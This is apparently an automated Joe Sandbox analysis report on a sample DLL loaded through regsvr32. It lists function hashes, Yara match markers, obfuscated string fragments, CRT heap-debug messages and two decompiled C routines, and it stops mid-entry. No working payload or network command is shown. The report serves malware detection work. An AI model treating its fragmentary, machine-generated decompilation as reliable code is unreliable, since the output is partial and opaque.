                                                      • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ
                                                      • API String ID: 1656799702-182684663
                                                      • Opcode ID: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                      • Instruction ID: 30c4da0a101ad128366c20b2541b857d1a248eb6f856515bedc9f5e1dcd2840f
                                                      • Opcode Fuzzy Hash: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                      • Instruction Fuzzy Hash: 58C16E36A18B4586EBA48B59E88076EB7E0F785790F614536EACD43BB4DB7ED401CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed., xrefs: 000007FEF9D260FA
                                                      • _heapchk fails with unknown return value!, xrefs: 000007FEF9D25DAF
                                                      • _1, xrefs: 000007FEF9D261FC
                                                      • _heapchk fails with _HEAPBADEND., xrefs: 000007FEF9D25D4D
                                                      • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                                      • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                                      • _heapchk fails with _HEAPBADPTR., xrefs: 000007FEF9D25D7E
                                                      • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                                      • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                                      • DAMAGED, xrefs: 000007FEF9D25E7D
                                                      • _heapchk fails with _HEAPBADNODE., xrefs: 000007FEF9D25D19
                                                      • _heapchk fails with _HEAPBADBEGIN., xrefs: 000007FEF9D25CE5
                                                      • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25F42
                                                      • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D26030
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$DAMAGED$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).$_heapchk fails with _HEAPBADBEGIN.$_heapchk fails with _HEAPBADEND.$_heapchk fails with _HEAPBADNODE.$_heapchk fails with _HEAPBADPTR.$_heapchk fails with unknown return value!$_1
                                                      • API String ID: 0-510578482
                                                      • Opcode ID: 15b327a6fa8e12693a207a0a7b33494fdffa5f56c7c2417c86fde08a07b35573
                                                      • Instruction ID: 2e3929c610d79aeb9f6375ea398ef70322b77c1420209f8d6f9956d4446a531d
                                                      • Opcode Fuzzy Hash: 15b327a6fa8e12693a207a0a7b33494fdffa5f56c7c2417c86fde08a07b35573
                                                      • Instruction Fuzzy Hash: A6E13F36A18B5586EBA4CB69E88072EB7E0F384754F614526EACD43BB4DB7ED051CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: E$#r5|$:B)$:F&$Jq-.$K$K$Y]$kJ$kJ$sg
                                                      • API String ID: 0-2241473280
                                                      • Opcode ID: cddb9e216d5522f206da78d8fc0cd1a272e9a6010eb05564972df6001c09f508
                                                      • Instruction ID: 9c682bca3309bc02ed949a6de7aa3bb6d22b0761abc13177b84899e0b503d48e
                                                      • Opcode Fuzzy Hash: cddb9e216d5522f206da78d8fc0cd1a272e9a6010eb05564972df6001c09f508
                                                      • Instruction Fuzzy Hash: 73E2E4715047CC8BDBB9DFA4C8897DD3BA1FB44344F10861AEC4EAE250DBB45A89CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 57%
                                                      			E000007FE7FEF9D23280(void* __eax, signed int __ecx, signed int __edx, signed int __rcx, signed int __rdx, void* __r8) {
                                                      				void* _t7;
                                                      				void* _t10;
                                                      				signed long long _t15;
                                                      				signed long long* _t16;
                                                      				signed long long _t20;
                                                      				signed long long _t24;
                                                      
                                                      				_t7 = __rcx -  *0xf9d4b018; // 0x6ec2365e8408
                                                      				if (_t7 != 0) goto 0xf9d2329a;
                                                      				asm("dec eax");
                                                      				if ((__ecx & 0x0000ffff) != 0) goto 0xf9d23296;
                                                      				asm("repe ret");
                                                      				asm("dec eax");
                                                      				goto 0xf9d23720;
                                                      				asm("int3");
                                                      				asm("int3");
                                                      				asm("int3");
                                                      				asm("int3");
                                                      				asm("int3");
                                                      				asm("int3");
                                                      				asm("int3");
                                                      				asm("o16 nop [eax+eax]");
                                                      				if (__r8 - 8 < 0) goto 0xf9d2330c;
                                                      				_t20 = __rdx * 0x1010101;
                                                      				_t10 = __r8 - 0x40;
                                                      				if (_t10 < 0) goto 0xf9d232ee;
                                                      				_t15 =  ~__rcx;
                                                      				if (_t10 == 0) goto 0xf9d232de;
                                                      				 *__rcx = _t20;
                                                      				_t16 = _t15 + __rcx;
                                                      				if (_t10 != 0) goto 0xf9d23327;
                                                      				_t24 = __r8 - _t15 & 7;
                                                      				if (_t10 == 0) goto 0xf9d2330c;
                                                      				 *_t16 = _t20;
                                                      				if (_t10 != 0) goto 0xf9d23300;
                                                      				if (_t24 == 0) goto 0xf9d2331b;
                                                      				_t16[1] = __edx & 0x000000ff;
                                                      				if (_t24 - 1 != 0) goto 0xf9d23311;
                                                      				return __eax;
                                                      			}










                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 3778485334-0
                                                      • Opcode ID: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
                                                      • Instruction ID: 807cfb07a33e429e3d371e20a7d7f9b872ed56a9d2d7ce20ec260cf370a1508c
                                                      • Opcode Fuzzy Hash: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
                                                      • Instruction Fuzzy Hash: 9B31B435908B4685EAA09B69FD443AEB3E0F784794F608026DACD43775DF7EE0588B41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _unlock
                                                      • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                      • API String ID: 2480363372-3680694803
                                                      • Opcode ID: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                      • Instruction ID: 8b5a52ed6c75746639c18038ef7af0115634e61e6ce836c346e70c61fc8f1b15
                                                      • Opcode Fuzzy Hash: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                      • Instruction Fuzzy Hash: 58510931A096828AE7F48B68EC4576E73E4F395354F618135DADD83BB4EB3EE4448B01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #X$ $A2>$Mum$vQ$=D$Fa
                                                      • API String ID: 0-1298193321
                                                      • Opcode ID: 982ab4627d106152f76a325de243923c319ce5c47f351cfe718817436c28ee1d
                                                      • Instruction ID: 1349cc56659c19f01a369150ff0067e3f34eaebe01bc07430d2f97da03610ed5
                                                      • Opcode Fuzzy Hash: 982ab4627d106152f76a325de243923c319ce5c47f351cfe718817436c28ee1d
                                                      • Instruction Fuzzy Hash: 24522775A0620CDFCB68DFA8D08A6DDBBF2EF58344F104119F816A7261D7B0D919CB89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ._$8%Y$@4<$F+}$R1$t$xy
                                                      • API String ID: 0-3078009748
                                                      • Opcode ID: 7cd976f9c86f50bd1c1ca064b29a615496490d447d7d5288ee1f6aa5414266f6
                                                      • Instruction ID: 0e1afbee3b71ea3b5863fe80692b11929ebce18e29255cef2241f67d7a77c22f
                                                      • Opcode Fuzzy Hash: 7cd976f9c86f50bd1c1ca064b29a615496490d447d7d5288ee1f6aa5414266f6
                                                      • Instruction Fuzzy Hash: 0402E1B1504649DFCB98DF28C489ADE3BE1FB48318F41812AFC4A9B764D770DA98CB45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 33%
                                                      			E000007FE7FEF9D2BE50(intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
                                                      				intOrPtr _v4;
                                                      				void* _v12;
                                                      				signed long long _v24;
                                                      				signed int _v36;
                                                      				long long _v180;
                                                      				long long _v184;
                                                      				intOrPtr _v192;
                                                      				char _v196;
                                                      				intOrPtr _v204;
                                                      				long _v212;
                                                      				long long _v220;
                                                      				long long _v228;
                                                      				long long _v1212;
                                                      				long long _v1308;
                                                      				char _v1460;
                                                      				char _v1476;
                                                      				char _v1484;
                                                      				int _v1492;
                                                      				long long _v1500;
                                                      				long long _v1508;
                                                      				long long _v1516;
                                                      				long long _v1524;
                                                      				long long _v1532;
                                                      				long long _v1540;
                                                      				void* _t51;
                                                      				signed long long _t80;
                                                      				long long _t85;
                                                      				void* _t100;
                                                      
                                                      				_a24 = r8d;
                                                      				_a16 = __edx;
                                                      				_a8 = __ecx;
                                                      				_t80 =  *0xf9d4b018; // 0x6ec2365e8408
                                                      				_v24 = _t80 ^ _t100 - 0x00000610;
                                                      				if (_a8 == 0xffffffff) goto 0xf9d2be8d;
                                                      				E000007FE7FEF9D28D90(_t51, _a8);
                                                      				_v184 = 0;
                                                      				memset(__edi, 0, 0x94 << 0);
                                                      				_v1508 =  &_v196;
                                                      				_v1500 =  &_v1460;
                                                      				_v1492 = 0;
                                                      				_v212 = 0;
                                                      				__imp__RtlCaptureContext();
                                                      				_t85 = _v1212;
                                                      				_v220 = _t85;
                                                      				r8d = 0;
                                                      				0xf9d40e28();
                                                      				_v228 = _t85;
                                                      				if (_v228 == 0) goto 0xf9d2bf64;
                                                      				_v1516 = 0;
                                                      				_v1524 =  &_v1476;
                                                      				_v1532 =  &_v1484;
                                                      				_v1540 =  &_v1460;
                                                      				0xf9d40e22();
                                                      				goto 0xf9d2bf84;
                                                      				_v1212 = _v12;
                                                      				_v1308 =  &_v12;
                                                      				_v196 = _a4;
                                                      				_v192 = _a12;
                                                      				_v180 = _v12;
                                                      				_v1492 = IsDebuggerPresent();
                                                      				SetUnhandledExceptionFilter(??);
                                                      				_v212 = UnhandledExceptionFilter(??);
                                                      				if (_v212 != 0) goto 0xf9d2bffb;
                                                      				if (_v1492 != 0) goto 0xf9d2bffb;
                                                      				if (_v4 == 0xffffffff) goto 0xf9d2bffb;
                                                      				return E000007FE7FEF9D23280(E000007FE7FEF9D28D90(_t59, _v4), _v4, __edx, _v36 ^ _t100 - 0x00000610, _v204, _v220);
                                                      			}

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 1239891234-0
                                                      • Opcode ID: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                      • Instruction ID: ff33e713b9b9862e94e2d2fd4ae4d55f0027255630586c455cca821aadc81769
                                                      • Opcode Fuzzy Hash: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                      • Instruction Fuzzy Hash: 7041BE32909BC58AE6B08B14F8443AFB3A1F388355F50522996CD42BA8EB7ED095CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #X$!Iv;$=`$M@$of?$uzxY
                                                      • API String ID: 0-1910763920
                                                      • Opcode ID: 9693a8ffcd6589fd3dbfdbad085aa322119c3f1a6317bc180f44839f00dc24fe
                                                      • Instruction ID: 7899ed511868268ad7aea3719dccceda62fd29fa6bb16e154aa46d1db7c43d79
                                                      • Opcode Fuzzy Hash: 9693a8ffcd6589fd3dbfdbad085aa322119c3f1a6317bc180f44839f00dc24fe
                                                      • Instruction Fuzzy Hash: F172047190478C8BDB58DF68C88A69E7FE1FB84384F20461DF95A9B260D770D989CF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #X$*I$;*v($;3$F9p$ef~j
                                                      • API String ID: 0-950528966
                                                      • Opcode ID: 9500c32e6f155eacac3cfe5a03c267215382f5440a46099a8d521f2441a56deb
                                                      • Instruction ID: 5057aee1002f2822c724537f3f36740fe0594223e2d956511feddf479ded4ebe
                                                      • Opcode Fuzzy Hash: 9500c32e6f155eacac3cfe5a03c267215382f5440a46099a8d521f2441a56deb
                                                      • Instruction Fuzzy Hash: 6A42E771144BCA8BCBB9CF24CC85BEF7BA0FB44306F145529D89A8A291DBB89745CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$9w$IX$M?@$jS<$M
                                                      • API String ID: 0-1157581923
                                                      • Opcode ID: 49f1c8efd4ee46ecb9d969e0aa9b812bfdd9bd3000ec2742c71bf52f4d967f5b
                                                      • Instruction ID: e375d1c8451a89c96fc0dfbd01d6dda6b37f4c7765b0f9ce143112ad2eac9b8a
                                                      • Opcode Fuzzy Hash: 49f1c8efd4ee46ecb9d969e0aa9b812bfdd9bd3000ec2742c71bf52f4d967f5b
                                                      • Instruction Fuzzy Hash: 8A32E4B0A147888BCBB8CF68C8897DD7BF0FB48318F90521DEA0A9B251DB745645CF59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$&n$1U$Oh$j/$X
                                                      • API String ID: 0-3716166881
                                                      • Opcode ID: 3ec52770ba243505623e348b6c36d4d02d94aade20e82fe7112f5902b3326bac
                                                      • Instruction ID: b98437ffb223a44b0e92d10549c73aaa59fdecde54cd589da16d290276777c9c
                                                      • Opcode Fuzzy Hash: 3ec52770ba243505623e348b6c36d4d02d94aade20e82fe7112f5902b3326bac
                                                      • Instruction Fuzzy Hash: D9F13C70508B88CFD7B9CF24D48969EBBF4FB84744F204A1EE5A59B260DBB09645CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: G8L$J9$ozq~$ss6$tiG$P;
                                                      • API String ID: 0-1765782432
                                                      • Opcode ID: c77c4daeda8c59326f72f8188263c488bfcd846ed7a7bd487d849044a826f1d5
                                                      • Instruction ID: 77e5b6b93cc6977e5a95292e040e55b4553736c218ba0195107264470a30d31c
                                                      • Opcode Fuzzy Hash: c77c4daeda8c59326f72f8188263c488bfcd846ed7a7bd487d849044a826f1d5
                                                      • Instruction Fuzzy Hash: FCC1097050064D8FDF89DF28C89A6DE3BA1FB68398F51421DFC4A962A1C778D994CBC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2893B
                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2894B
                                                      • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28963
                                                      • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2897B
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28998
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                      • String ID:
                                                      • API String ID: 1445889803-0
                                                      • Opcode ID: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                      • Instruction ID: 08a22431f858d3c52821bee646358606f5e13fcd060269a72eebdbe744b14aa1
                                                      • Opcode Fuzzy Hash: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                      • Instruction Fuzzy Hash: 7A21E62160AF0585DAB08B19FC5032E77E0E78DBA5F241235AADD83778EF3DD2948700
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,bF$-Ie:$Y$jc$_
                                                      • API String ID: 0-2562869522
                                                      • Opcode ID: 13dcfdf2b547f47b8e652e45a129a81bd12d479633329dbfd5d4c9c90b2a7465
                                                      • Instruction ID: be835d82a8a11271eaf2d0d4144821f845ce411821323c63ff6fa91e08a90877
                                                      • Opcode Fuzzy Hash: 13dcfdf2b547f47b8e652e45a129a81bd12d479633329dbfd5d4c9c90b2a7465
                                                      • Instruction Fuzzy Hash: 2F82FC7190478C8BDBBDCF24C8466DE7BE1FB88744F104A1DEA5A8A350D7B49785CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$3'p$AVx.$R@\$|7}
                                                      • API String ID: 0-1377184578
                                                      • Opcode ID: 42416e948d3c9d06b93ab1f3a8ba6bb7b4031ce7609dd7b48ddc645cdcf3989a
                                                      • Instruction ID: 11bdd15b6fdebef4e4e33012fe2102d5287f0ed75640ad066b8b9400528ec4a7
                                                      • Opcode Fuzzy Hash: 42416e948d3c9d06b93ab1f3a8ba6bb7b4031ce7609dd7b48ddc645cdcf3989a
                                                      • Instruction Fuzzy Hash: F0820774604BC88BDBB8DF24DC857CD7BE0FB86305F20561DD95E9AA60CBB89645CB02
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .s$/$*$89$W0$j~L
                                                      • API String ID: 0-3680180293
                                                      • Opcode ID: b1eb1fe3fa88397c885ab509abe1c858ffcdb74bf15ef161dec0971567ed18e8
                                                      • Instruction ID: f5b8073de7550f00aae71ce47ac4d0d330c984d331b26572373d31fffc6277f7
                                                      • Opcode Fuzzy Hash: b1eb1fe3fa88397c885ab509abe1c858ffcdb74bf15ef161dec0971567ed18e8
                                                      • Instruction Fuzzy Hash: 9332237050C7848FC369DF68C58A65EBBF0FB8A744F004A1EF68687260D7B6D949CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: :_$DHM$J? $ioF$IE
                                                      • API String ID: 0-1950181368
                                                      • Opcode ID: 259697ebe02e240ff157c8cb6796f3c563015099138ecee0effd1804923e127d
                                                      • Instruction ID: dfce06ae3f2776b2053eb0988bfb390665c026a97965fcc171ceda4eb787facd
                                                      • Opcode Fuzzy Hash: 259697ebe02e240ff157c8cb6796f3c563015099138ecee0effd1804923e127d
                                                      • Instruction Fuzzy Hash: 4E02F470A0470DEFDB99DF68C089A8EBBF1FB48344F40856AE809EB250D7749A59CB45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \=V$h9&$n"$wPT$5Z3
                                                      • API String ID: 0-226182706
                                                      • Opcode ID: ce1cfba10c1d8d8dcb7fefef68f5dbb71196a1667c8063e3a43dba33cd0a9cce
                                                      • Instruction ID: 86bcb4527d36acdb60297ed143c12856cad003a08b6179b63c097fe4f6929213
                                                      • Opcode Fuzzy Hash: ce1cfba10c1d8d8dcb7fefef68f5dbb71196a1667c8063e3a43dba33cd0a9cce
                                                      • Instruction Fuzzy Hash: F7E11871A0468C8BDF59CFE8C48ABDDBBF2FB54348F004129D906BB298D774951ACB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2k$5.A$h$Tv$|
